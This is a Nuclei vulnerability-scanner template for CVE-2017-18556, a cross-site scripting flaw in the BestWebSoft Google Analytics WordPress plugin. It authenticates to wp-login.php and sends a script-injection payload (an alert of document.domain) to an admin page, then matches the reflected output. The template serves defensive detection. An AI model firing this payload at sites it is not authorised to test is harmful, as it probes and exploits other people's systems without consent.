nuclei-templates/http/cves/2017/CVE-2017-18556.yaml

48 lines
1.6 KiB
YAML
Raw Normal View History

2023-10-05 18:36:49 +00:00
id: CVE-2017-18556
info:
2023-10-22 12:35:42 +00:00
name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting
2023-10-05 18:36:49 +00:00
author: luisfelipe146
severity: medium
description: |
The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues.
2023-10-25 07:00:43 +00:00
remediation: Fixed in version 1.7.1
2023-10-05 18:36:49 +00:00
reference:
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
- https://nvd.nist.gov/vuln/detail/CVE-2017-18556
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556
- https://wordpress.org/plugins/bws-google-analytics/#developers
classification:
cve-id: CVE-2017-18556
metadata:
2023-10-23 09:43:49 +00:00
max-request: 3
2023-10-05 18:36:49 +00:00
verified: true
2023-10-23 09:43:49 +00:00
publicwww-query: "/wp-content/plugins/bws-google-analytics/"
tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated
2023-10-05 18:36:49 +00:00
2023-10-22 12:35:42 +00:00
http:
2023-10-05 18:36:49 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
2023-10-22 12:35:42 +00:00
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1
2023-10-05 18:36:49 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers:
2023-10-22 12:35:42 +00:00
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
- 'contains(body_3, "Google Analytics by BestWebSoft")'
condition: and